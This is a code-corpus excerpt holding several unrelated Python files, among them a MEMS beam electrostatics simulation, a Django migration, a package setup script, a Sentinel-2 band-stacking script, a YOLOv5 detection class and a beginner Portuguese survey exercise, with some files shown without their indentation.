sys.setdlopenflags(0x100|0x2)
#import tecplotExporter
import fvm.fvmbaseExt as fvmbaseExt
import fvm.importers as importers
import fvm.models_atyped_double as models
import fvm.exporters_atyped_double as exporters
from FluentCase import FluentCase
from fvm.fvmbaseExt import VecD3
from mpi4py import MPI
import time
def checkMarking(n):
cells = fluidMeshes[0].getCells()
nCells = cells.getCount()
cellCoords = geomFields.coordinate[cells].asNumPyArray()
fluidFile = open(fileBase + "fluidCells_" + str(n) + ".dat", "w")
solidFile = open(fileBase + "solidCells_" + str(n) + ".dat", "w")
IBFile = open(fileBase + "IBCells_" + str(n) + ".dat", "w")
cellIBType = geomFields.ibType[cells].asNumPyArray()
for c in range (0, nCells):
ibtype = cellIBType[c]
if ibtype == -1:
fluidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -2:
IBFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -3:
solidFile.write("%e\t%e\t%e\n" % (cellCoords[c][0], cellCoords[c][1], cellCoords[c][2]))
elif ibtype == -5:
print ("%i\t%i\t%e\t%e\n" % (c,ibtype, cellCoords[c][0], cellCoords[c][1]))
fluidFile.close()
solidFile.close()
IBFile.close()
def writeProbeData():
deformation = plateFields.deformation[solidMeshes[0].getCells()].asNumPyArray()
maxDef = deformation.min(axis = 0)
probeFile.write('%e\t%e\t%e\n' % (globalTime, deformation[probeIndex][2], maxDef[2]))
probeFile.flush()
def saveVTK(n):
writer = exporters.VTKWriterA(geomFields,fluidMeshes,
fileBase + "elecfield-" + str(n) + ".vtk",
"frogleg",
False,0)
writer.init()
writer.writeScalarField(elecFields.potential,"potential")
writer.writeVectorField(elecFields.electric_field,"potentialgradient")
writer.finish()
writer1 = exporters.VTKWriterA(geomFields,solidMeshes,
fileBase + "deformation-" + str(n) + ".vtk",
"frogleg",
False,0)
writer1.init()
writer1.writeVectorField(plateFields.deformation,"deformation")
writer1.finish()
### ========================== properties and parameters ===============================###
### beam
rho = 8912 # density kg/m^3
E = 200e9 # Young's modulus
nu = 0.31 # Poisson's ratio
### electric field
applied_voltage = -100
dielectric_constant = 1.0
beam_thickness = 3e-6
### mesh id
fluidTop = 7
fluidBot = [9,3]
fluidSide = 8
left_electrode = 4
right_electrode = 5
central_electrode = 6
beam = [3]
anchors = [4, 5, 6, 7]
numTimeSteps = 1
globalTime = 0
globalCount = 0
timeStep = 5e-8
saveFrequency = 50
initialTransient = False
probeIndex = 50
### ===================== mesh read ===============================================###
fileBase = "./"
### 2D plate mesh
beamReader = FluentCase(sys.argv[2])
beamReader.read();
solidMeshes = beamReader.getMeshList()
geomFields = models.GeomFields('geom')
solidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidMeshes)
solidMetricsCalculator.init()
### 3D fluid mesh
fluidReader = FluentCase(sys.argv[1])
fluidReader.read();
fluidMeshes = fluidReader.getMeshList()
fluidMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,fluidMeshes)
fluidMetricsCalculator.init()
nodes = fluidMeshes[0].getNodes()
xn = fluidMeshes[0].getNodeCoordinates().asNumPyArray()
for n in range(0, nodes.getCount()):
x = xn[n][0]
y = xn[n][1]
xn[n][0] = -y
xn[n][1] = x
fluidMetricsCalculator.init()
### generate solid boundary mesh
solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
solidBoundaryMetricsCalculator.init()
### find device center
cells = solidMeshes[0].getCells()
xc = geomFields.coordinate[cells].asNumPyArray()
small = 100
probeIndex = 0
for c in range(0, cells.getCount()):
rsqr = xc[c][0]*xc[c][0] + xc[c][1]*xc[c][1]
if rsqr < small:
small = rsqr
probeIndex = c
### output files
probeFile = open(fileBase + "centerDisplacement.dat", "w")
### =============================== models =====================================###
### Plate Model and boundary conditions ###
plateFields = models.PlateFields('plate')
pmodel = models.PlateModelA(geomFields,plateFields,solidMeshes)
dmodel = models.PlateDeformationModelA(geomFields,plateFields,solidMeshes)
bcMap = pmodel.getBCMap()
for id in anchors:
bc = bcMap[id]
bc.bcType = 'Clamped'
bc['specifiedXRotation']=0
bc['specifiedYRotation']=0.
bc['specifiedZDeformation']=0.
for id in beam:
bc = bcMap[id]
bc.bcType = 'SpecifiedTraction'
vcMap = pmodel.getVCMap()
for i,vc in vcMap.iteritems():
vc['density'] = rho
vc['ym'] = E
vc['nu'] = nu
### electric model and boundary condition ###
elecFields = models.ElectricFields('elec')
emodel = models.ElectricModelA(geomFields,elecFields,fluidMeshes)
bcMap = emodel.getBCMap()
bc = bcMap[central_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = applied_voltage
bc = bcMap[left_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[right_electrode]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
bc = bcMap[fluidTop]
bc.bcType = "Symmetry"
for i in fluidBot:
bc = bcMap[i]
bc.bcType = "SpecifiedPotential"
bc['specifiedPotential'] = 0.0
for i in [fluidSide]:
bc = bcMap[i]
bc.bcType = "Symmetry"
vcMap = emodel.getVCMap()
for i,vc in vcMap.iteritems():
vc.vcType = "dielectric"
vc['dielectric_constant'] = dielectric_constant
### ================================= solvers ===================================###
### plate solver ###
pc = fvmbaseExt.AMG()
pc.verbosity=0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 50000
defSolver.verbosity=0
poptions = pmodel.getOptions()
poptions.deformationLinearSolver = defSolver
poptions.deformationTolerance=1.0e-3
poptions.setVar("deformationURF",1.0)
poptions.printNormalizedResiduals=True
poptions.timeDiscretizationOrder = 2
poptions.transient=True
poptions.scf = 5./6.
poptions.setVar('timeStep',timeStep)
### elec solver ###
epc = fvmbaseExt.AMG()
epc.verbosity=0
elecSolver = fvmbaseExt.BCGStab()
elecSolver.preconditioner = epc
elecSolver.relativeTolerance = 1e-3
elecSolver.nMaxIterations = 1000
elecSolver.maxCoarseLevels=20
elecSolver.verbosity=0
eoptions = emodel.getOptions()
eoptions.electrostaticsLinearSolver = elecSolver
eoptions.electrostaticsTolerance = 0.5e-5
eoptions.electrostatics_enable = 1
eoptions.chargetransport_enable = 0
eoptions.tunneling = 0
eoptions.ibm_enable = 1
eoptions.transient_enable = False
eoptions.printNormalizedResiduals = True
### initialize models and run ###
pmodel.init()
emodel.init()
dmodel.init()
ibManager = fvmbaseExt.IBManager(geomFields,
solidBoundaryMeshes[0],
fluidMeshes)
for mesh in solidBoundaryMeshes:
faces = mesh.getFaces()
areaMag = geomFields.areaMag[faces]
faceCount = faces.getCount()
pot = areaMag.newSizedClone(faceCount)
pota = pot.asNumPyArray()
pota[:] = 0
elecFields.potential[faces] = pot
sbMeshFaces = solidBoundaryMeshes[0].getFaces()
ibManager.fluidNeighborsPerIBFace = 4
ibManager.solidNeighborsPerIBFace = 4
ibManager.fluidNeighborsPerSolidFace = 6
ibManager.update()
checkMarking(globalCount)
t1 = time.time()
pc.redirectPrintToFile("convergence.dat")
#--------------Timestep Loop --------------------------#
for n in range(0, numTimeSteps):
# --------------- update IBM -------------------------#
print "*** update IBM at globalCount %i ***" % globalCount
ibManager.update()
fluidMetricsCalculator.computeIBInterpolationMatrices(sbMeshFaces)
fluidMetricsCalculator.computeSolidInterpolationMatrices(sbMeshFaces)
#------------solve electrostatics--------#
print "*** solving electric model at globalCount %i ***" % globalCount
for i in range(0, 10):
emodel.computeIBFacePotential(sbMeshFaces)
emodel.advance(1)
emodel.computeSolidSurfaceForcePerUnitArea(sbMeshFaces)
#saveVTK(n)
#------------update force on beam ----------#
print "*** update force at globalCount %i ***" % globalCount
sbElecForce = elecFields.force[sbMeshFaces].asNumPyArray()
solidMesh = solidMeshes[0]
solidCells = solidMesh.getCells()
nCells = solidCells.getCount()
nSelfCells = solidCells.getSelfCount()
nSBFaces = sbMeshFaces.getCount()
if (nSBFaces != 2*nSelfCells+(nCells-nSelfCells)):
print "the extruded solid boundary mesh has wrong face numbers!"
force = plateFields.force[solidCells].asNumPyArray()
thickness = plateFields.thickness[solidCells].asNumPyArray()
force[:] = 0.
thickness[:] = beam_thickness
# force on interior cells
for c in range(0, nSelfCells):
botFaceIndex = c
topFaceIndex = c+nSelfCells
force[c] = sbElecForce[botFaceIndex][2] + sbElecForce[topFaceIndex][2]
# force on boundary cells
for c in range(nSelfCells, nCells):
force[c] = sbElecForce[nSelfCells+c][2]
#pdb.set_trace()
#------------solve structure-------------#
print "*** solving structure model at globalCount %i ***" % globalCount
for i in range (0, 3):
pmodel.advance(1)
dmodel.calculateNodeDisplacement()
dmodel.deformPlate()
solidMetricsCalculator.recalculate_deform()
#------------update solid boundary mesh---------------#
#solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes]
sbNodes = solidBoundaryMeshes[0].getNodes()
nSBNodes = sbNodes.getCount()
nodes = solidMeshes[0].getNodes()
if nSBNodes != nodes.getCount()*2:
print "the extruded solid mesh has wrong node number!"
nodeCoord = geomFields.coordinate[nodes].asNumPyArray()
bNodeCoord = geomFields.coordinate[sbNodes].asNumPyArray()
bMeshCoord = solidBoundaryMeshes[0].getNodeCoordinates().asNumPyArray()
deformation = geomFields.nodeDisplacement[nodes].asNumPyArray()
#pdb.set_trace()
for sbn in range (0, nSBNodes/2):
bNodeCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
bMeshCoord[sbn][2] = -beam_thickness/2 + nodeCoord[sbn][2]
for sbn in range (nSBNodes/2, nSBNodes):
bNodeCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
bMeshCoord[sbn][2] = beam_thickness/2 + nodeCoord[sbn - nSBNodes/2][2]
#pdb.set_trace()
#solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes)
#solidBoundaryMetricsCalculator.init()
solidBoundaryMetricsCalculator.recalculate_deform()
# -----------------update time --------------------------#
pmodel.updateTime()
dmodel.updateTime()
globalTime += timeStep
globalCount += 1
#------data output-----------------------#
writeProbeData()
if (n%saveFrequency == 0):
saveVTK(n)
# checkMarking(globalCount)
t2 = time.time()
pc.redirectPrintToScreen()
probeFile.close()
print '\nsolution time = %f' % (t2-t1)
| en | 0.337344 | #!/usr/bin/env python ### this script solve frogleg pull-in by coupling ### plate model and electrostatics via IBM ### import modules ### #import tecplotExporter ### ========================== properties and parameters ===============================### ### beam # density kg/m^3 # Young's modulus # Poisson's ratio ### electric field ### mesh id ### ===================== mesh read ===============================================### ### 2D plate mesh ### 3D fluid mesh ### generate solid boundary mesh ### find device center ### output files ### =============================== models =====================================### ### Plate Model and boundary conditions ### ### electric model and boundary condition ### ### ================================= solvers ===================================### ### plate solver ### ### elec solver ### ### initialize models and run ### #--------------Timestep Loop --------------------------# # --------------- update IBM -------------------------# #------------solve electrostatics--------# #saveVTK(n) #------------update force on beam ----------# # force on interior cells # force on boundary cells #pdb.set_trace() #------------solve structure-------------# #------------update solid boundary mesh---------------# #solidBoundaryMeshes = [m.extrude(1, beam_thickness, True) for m in solidMeshes] #pdb.set_trace() #pdb.set_trace() #solidBoundaryMetricsCalculator = models.MeshMetricsCalculatorA(geomFields,solidBoundaryMeshes) #solidBoundaryMetricsCalculator.init() # -----------------update time --------------------------# #------data output-----------------------# # checkMarking(globalCount) | 1.893102 | 2 |
example/app/example/migrations/0001_initial.py | timrichardson/django-admin-search | 40 | 6616746 | # Generated by Django 2.2.2 on 2019-06-15 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('active', models.BooleanField(default=True)),
('description', models.TextField(max_length=500)),
('date', models.DateField()),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
]
| # Generated by Django 2.2.2 on 2019-06-15 17:53
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Area',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('active', models.BooleanField(default=True)),
('description', models.TextField(max_length=500)),
('date', models.DateField()),
],
options={
'verbose_name': 'Area',
'verbose_name_plural': 'Areas',
},
),
]
| en | 0.756509 | # Generated by Django 2.2.2 on 2019-06-15 17:53 | 1.847624 | 2 |
setup.py | DinaraN/adaptnlp | 1 | 6616747 | #!/usr/bin/env python
from pathlib import Path
from setuptools import setup, find_packages
version_file = Path(__file__).parent.joinpath("adaptnlp", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
with open("requirements.txt") as reqs_file:
install_requires = reqs_file.read().splitlines()
with open("requirements_dev.txt") as reqs_dev_file:
dev_requires = reqs_dev_file.read().splitlines()
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="adaptnlp",
version=version,
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
keywords=[
"NLP",
"flair",
"Natural Language Processing",
"Machine Learning",
"ML",
"torch",
"pytorch",
"NER",
],
install_requires=install_requires,
extras_require={
'dev': dev_requires
},
license="Apache 2.0",
description="AdaptNLP: A Natural Language Processing Library and Framework",
long_description=long_description,
long_description_content_type="text/markdown",
include_package_data=True,
zip_safe=True,
)
| #!/usr/bin/env python
from pathlib import Path
from setuptools import setup, find_packages
version_file = Path(__file__).parent.joinpath("adaptnlp", "VERSION.txt")
version = version_file.read_text(encoding="UTF-8").strip()
with open("requirements.txt") as reqs_file:
install_requires = reqs_file.read().splitlines()
with open("requirements_dev.txt") as reqs_dev_file:
dev_requires = reqs_dev_file.read().splitlines()
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
setup(
name="adaptnlp",
version=version,
author="<NAME>",
author_email="<EMAIL>",
packages=find_packages(),
keywords=[
"NLP",
"flair",
"Natural Language Processing",
"Machine Learning",
"ML",
"torch",
"pytorch",
"NER",
],
install_requires=install_requires,
extras_require={
'dev': dev_requires
},
license="Apache 2.0",
description="AdaptNLP: A Natural Language Processing Library and Framework",
long_description=long_description,
long_description_content_type="text/markdown",
include_package_data=True,
zip_safe=True,
)
| ru | 0.26433 | #!/usr/bin/env python | 1.737597 | 2 |
geoRpro/script/stack_sent2_bands.py | ESS-uzh/geoRpro | 0 | 6616748 | <filename>geoRpro/script/stack_sent2_bands.py
import os
import copy
from contextlib import contextmanager
from contextlib import ExitStack
import numpy as np
import rasterio
from rasterio.mask import mask
from rasterio.windows import Window
import shapely
from geoRpro.sent2 import Sentinel2
from geoRpro.raster import Rstack
import geoRpro.raster as rst
import pdb
INDIR = "/home/diego/work/dev/data"
s10 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R10m/"))
s20 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R20m/"))
win = Window(0, 0, 3000, 3000)
with ExitStack() as stack_files:
ras10 = [stack_files.enter_context(rasterio.open(fp))
for fp in s10.get_fpaths('B02_10m', 'B03_10m', 'B04_10m', 'B08_10m')]
ras20 = [stack_files.enter_context(rasterio.open(fp))
for fp in s20.get_fpaths('B05_20m', 'B06_20m', 'B07_20m', 'B8A_20m', 'B11_20m', 'B12_20m')]
ras_final = ras10+ras20
order = [0, 1, 2, 4, 5, 6, 3, 7, 8, 9]
with ExitStack() as stack_action:
rstack = Rstack()
for idx, src in enumerate(ras_final):
if idx > 3: # resample to 10 m
print(f"scr to resample, res: {src.res}")
arr_r, meta = rst.load_resample(src)
src = stack_action.enter_context(rst.to_src(arr_r, meta))
print(f"scr resampled with res: {src.res}")
arr, meta = rst.load_window(src, win)
src = stack_action.enter_context(rst.to_src(arr, meta))
print(f"scr to add to the stack with res: {src.res}")
rstack.add_item(src)
rstack.set_metadata_param('interleave', 'band')
rstack.reorder_items(order)
fpath = rst.write_raster(rstack.items, rstack.metadata_collect, os.path.join(s10.dirpath, "S2B_T20MPA_20200803_Subset_med.tif"))
print(fpath)
| <filename>geoRpro/script/stack_sent2_bands.py
import os
import copy
from contextlib import contextmanager
from contextlib import ExitStack
import numpy as np
import rasterio
from rasterio.mask import mask
from rasterio.windows import Window
import shapely
from geoRpro.sent2 import Sentinel2
from geoRpro.raster import Rstack
import geoRpro.raster as rst
import pdb
INDIR = "/home/diego/work/dev/data"
s10 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R10m/"))
s20 = Sentinel2(os.path.join(INDIR, "amazon/S2B_MSIL2A_20200803T142739_N0214_R053_T20MPA_20200803T165642.SAFE/GRANULE/L2A_T20MPA_A017811_20200803T142734/IMG_DATA/R20m/"))
win = Window(0, 0, 3000, 3000)
with ExitStack() as stack_files:
ras10 = [stack_files.enter_context(rasterio.open(fp))
for fp in s10.get_fpaths('B02_10m', 'B03_10m', 'B04_10m', 'B08_10m')]
ras20 = [stack_files.enter_context(rasterio.open(fp))
for fp in s20.get_fpaths('B05_20m', 'B06_20m', 'B07_20m', 'B8A_20m', 'B11_20m', 'B12_20m')]
ras_final = ras10+ras20
order = [0, 1, 2, 4, 5, 6, 3, 7, 8, 9]
with ExitStack() as stack_action:
rstack = Rstack()
for idx, src in enumerate(ras_final):
if idx > 3: # resample to 10 m
print(f"scr to resample, res: {src.res}")
arr_r, meta = rst.load_resample(src)
src = stack_action.enter_context(rst.to_src(arr_r, meta))
print(f"scr resampled with res: {src.res}")
arr, meta = rst.load_window(src, win)
src = stack_action.enter_context(rst.to_src(arr, meta))
print(f"scr to add to the stack with res: {src.res}")
rstack.add_item(src)
rstack.set_metadata_param('interleave', 'band')
rstack.reorder_items(order)
fpath = rst.write_raster(rstack.items, rstack.metadata_collect, os.path.join(s10.dirpath, "S2B_T20MPA_20200803_Subset_med.tif"))
print(fpath)
| en | 0.807126 | # resample to 10 m | 2.239348 | 2 |
src/vision/scripts/predict_image.py | ucwxb/trash_sort | 0 | 6616749 | import sys
import os
# sys.path.append(rospy.get_param('/pkg_path/vision'))
import torch
from models.experimental import attempt_load
import numpy as np
from numpy import random
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords,
xyxy2xywh, plot_one_box, strip_optimizer, set_logging)
from utils.datasets import LoadStreams, LoadImages,letterbox
import cv2
class detectImage:
def __init__(self,modulePath,imgsz = 640,classes = 0,device=''):
self.selectDevice(device) #选择gpu或cpu
self.modulePath = modulePath #模型路径
self.model = attempt_load(modulePath, map_location=self.device) # 加载模型
self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names # 获取类别
self.colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(self.names))] # 为不同类别分配颜色
self.classes = classes
self.imgsz = imgsz #图片大小
self.update = 0 #是否更新的标志
def selectDevice(self,device):
cpu_request = device.lower() == 'cpu'
cuda = False if cpu_request else torch.cuda.is_available()
self.device = torch.device('cuda:0' if cuda else 'cpu')
def loadPic(self,frame): #图像预处理
self.src_img = frame.copy()
self.detect_img = frame
img = letterbox(self.detect_img, new_shape=self.imgsz)[0]
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(self.device)
img = img.float()
img /= 255.0 # 归一化
if img.ndimension() == 3:
img = img.unsqueeze(0)
return img
def detect(self,frame,vision_detect_service_res):
img = self.loadPic(frame) #加载数据集
pred = self.model(img, augment=False)[0] #检测
pred = non_max_suppression(pred, 0.4, 0.5, classes=None, agnostic=False)[0] #NMS
if pred is not None and len(pred):
pred[:, :4] = scale_coords(img.shape[2:], pred[:, :4], self.detect_img.shape).round()
pred = pred.cuda().data.cpu().numpy()
max_indexs = np.argmax(pred, axis=0)
max_index = max_indexs[-2]
pred = pred[max_index]
*xyxy, conf, cls = pred
label = '%s %.2f' % (self.names[int(cls)], conf)
plot_one_box(xyxy, self.detect_img, label=label, color=self.colors[int(cls)])
vision_detect_service_res.isFind = 1
vision_detect_service_res.detect_res = cls
vision_detect_service_res.conf = conf
return vision_detect_service_res
# res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist()
# res_xyxy = torch.tensor(xyxy).view(-1).tolist()
# self.res_xywh.append(res_xywh)
# self.res_xyxy.append(res_xyxy)
# diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist() #对角坐标
# xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist() #中心坐标与长宽
# label = '%s' % (self.names[int(cls)])
# put_str = 'location:'
# for rect in diag_co: #画框与文字
# # rect = [int(i) for i in rect]
# # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6)
# cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6)
# # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# put_str += str(rect)
# cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6)
# self.diag_co = diag_co
# self.center_co = center_co
# self.label = label
# self.conf = conf
if __name__ == '__main__':
testM = detectImage('v5l-last.pt')
frame = cv2.imread('2.png')
testM.detect(frame)
| import sys
import os
# sys.path.append(rospy.get_param('/pkg_path/vision'))
import torch
from models.experimental import attempt_load
import numpy as np
from numpy import random
from utils.general import (
check_img_size, non_max_suppression, apply_classifier, scale_coords,
xyxy2xywh, plot_one_box, strip_optimizer, set_logging)
from utils.datasets import LoadStreams, LoadImages,letterbox
import cv2
class detectImage:
def __init__(self,modulePath,imgsz = 640,classes = 0,device=''):
self.selectDevice(device) #选择gpu或cpu
self.modulePath = modulePath #模型路径
self.model = attempt_load(modulePath, map_location=self.device) # 加载模型
self.names = self.model.module.names if hasattr(self.model, 'module') else self.model.names # 获取类别
self.colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(self.names))] # 为不同类别分配颜色
self.classes = classes
self.imgsz = imgsz #图片大小
self.update = 0 #是否更新的标志
def selectDevice(self,device):
cpu_request = device.lower() == 'cpu'
cuda = False if cpu_request else torch.cuda.is_available()
self.device = torch.device('cuda:0' if cuda else 'cpu')
def loadPic(self,frame): #图像预处理
self.src_img = frame.copy()
self.detect_img = frame
img = letterbox(self.detect_img, new_shape=self.imgsz)[0]
img = img[:, :, ::-1].transpose(2, 0, 1) # BGR to RGB, to 3x416x416
img = np.ascontiguousarray(img)
img = torch.from_numpy(img).to(self.device)
img = img.float()
img /= 255.0 # 归一化
if img.ndimension() == 3:
img = img.unsqueeze(0)
return img
def detect(self,frame,vision_detect_service_res):
img = self.loadPic(frame) #加载数据集
pred = self.model(img, augment=False)[0] #检测
pred = non_max_suppression(pred, 0.4, 0.5, classes=None, agnostic=False)[0] #NMS
if pred is not None and len(pred):
pred[:, :4] = scale_coords(img.shape[2:], pred[:, :4], self.detect_img.shape).round()
pred = pred.cuda().data.cpu().numpy()
max_indexs = np.argmax(pred, axis=0)
max_index = max_indexs[-2]
pred = pred[max_index]
*xyxy, conf, cls = pred
label = '%s %.2f' % (self.names[int(cls)], conf)
plot_one_box(xyxy, self.detect_img, label=label, color=self.colors[int(cls)])
vision_detect_service_res.isFind = 1
vision_detect_service_res.detect_res = cls
vision_detect_service_res.conf = conf
return vision_detect_service_res
# res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist()
# res_xyxy = torch.tensor(xyxy).view(-1).tolist()
# self.res_xywh.append(res_xywh)
# self.res_xyxy.append(res_xyxy)
# diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist() #对角坐标
# xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
# center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist() #中心坐标与长宽
# label = '%s' % (self.names[int(cls)])
# put_str = 'location:'
# for rect in diag_co: #画框与文字
# # rect = [int(i) for i in rect]
# # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6)
# cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6)
# # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6)
# put_str += str(rect)
# cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6)
# self.diag_co = diag_co
# self.center_co = center_co
# self.label = label
# self.conf = conf
if __name__ == '__main__':
testM = detectImage('v5l-last.pt')
frame = cv2.imread('2.png')
testM.detect(frame)
| en | 0.223245 | # sys.path.append(rospy.get_param('/pkg_path/vision')) #选择gpu或cpu #模型路径 # 加载模型 # 获取类别 # 为不同类别分配颜色 #图片大小 #是否更新的标志 #图像预处理 # BGR to RGB, to 3x416x416 # 归一化 #加载数据集 #检测 #NMS # res_xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4))).view(-1).tolist() # res_xyxy = torch.tensor(xyxy).view(-1).tolist() # self.res_xywh.append(res_xywh) # self.res_xyxy.append(res_xyxy) # diag_co = torch.tensor(xyxy).view(1, 4).detach().numpy().tolist() #对角坐标 # xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh # center_co = (torch.tensor(xywh) * gn).detach().numpy().tolist() #中心坐标与长宽 # label = '%s' % (self.names[int(cls)]) # put_str = 'location:' # for rect in diag_co: #画框与文字 # # rect = [int(i) for i in rect] # # cv2.rectangle(self.im0, (rect[0],rect[1],rect[2],rect[3]), (0, 0, 255),6) # cv2.rectangle(self.im0, (int(rect[0]),int(rect[1]),int(rect[2]),int(rect[3])), (0, 0, 255),6) # # cv2.putText(self.im0, label, (rect[0],rect[1]), cv2.FONT_ITALIC, 4, (0, 255, 0), 6) # cv2.putText(self.im0, label, (int(rect[0]),int(rect[1])), cv2.FONT_ITALIC, 4, (0, 255, 0), 6) # put_str += str(rect) # cv2.putText(self.im0, put_str, (10, 100), cv2.FONT_ITALIC, 3, (255, 0, 0), 6) # self.diag_co = diag_co # self.center_co = center_co # self.label = label # self.conf = conf | 2.093388 | 2 |
desafios/desafio 069.py | juaoantonio/curso_video_python | 0 | 6616750 | <filename>desafios/desafio 069.py
# Variáveis
maiores_de_idade = 0
homens = 0
mulheres_menos_de_20 = 0
# Repetição dos inputs
while True:
# Cabeçalho do programa
print('-' * 50)
print('CADASTRE UMA PESSOA'.center(50))
print('-' * 50)
# Inputs de idade e sexo e as condições para cada caso
idade = int(input('Idade: '))
if idade >= 18:
maiores_de_idade += 1
sexo = str(input('Sexo [M/F]: ')).strip().upper()
if sexo[0] == 'M':
homens += 1
elif sexo[0] == 'F' and idade >= 20:
mulheres_menos_de_20 += 1
print('-' * 50)
# Pergunta para usuário se ele quer continuar no programa
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
while continuar != 'S' and continuar != 'N':
print('Não entendi. Digite algo válido!')
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
if continuar == 'N':
break
# Resultado final
print()
print(f'''Resultados da análise:
Total de pessoas com mais de 18 anos: {maiores_de_idade}
Total de homens cadastrados: {homens}
Total de mulheres com mais de 20 anos: {mulheres_menos_de_20}''')
| <filename>desafios/desafio 069.py
# Variáveis
maiores_de_idade = 0
homens = 0
mulheres_menos_de_20 = 0
# Repetição dos inputs
while True:
# Cabeçalho do programa
print('-' * 50)
print('CADASTRE UMA PESSOA'.center(50))
print('-' * 50)
# Inputs de idade e sexo e as condições para cada caso
idade = int(input('Idade: '))
if idade >= 18:
maiores_de_idade += 1
sexo = str(input('Sexo [M/F]: ')).strip().upper()
if sexo[0] == 'M':
homens += 1
elif sexo[0] == 'F' and idade >= 20:
mulheres_menos_de_20 += 1
print('-' * 50)
# Pergunta para usuário se ele quer continuar no programa
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
while continuar != 'S' and continuar != 'N':
print('Não entendi. Digite algo válido!')
continuar = str(input('Quer continuar? [S/N] ')).strip().upper()
if continuar == 'N':
break
# Resultado final
print()
print(f'''Resultados da análise:
Total de pessoas com mais de 18 anos: {maiores_de_idade}
Total de homens cadastrados: {homens}
Total de mulheres com mais de 20 anos: {mulheres_menos_de_20}''')
| pt | 0.969544 | # Variáveis # Repetição dos inputs # Cabeçalho do programa # Inputs de idade e sexo e as condições para cada caso # Pergunta para usuário se ele quer continuar no programa # Resultado final Resultados da análise: Total de pessoas com mais de 18 anos: {maiores_de_idade} Total de homens cadastrados: {homens} Total de mulheres com mais de 20 anos: {mulheres_menos_de_20} | 4.069018 | 4 |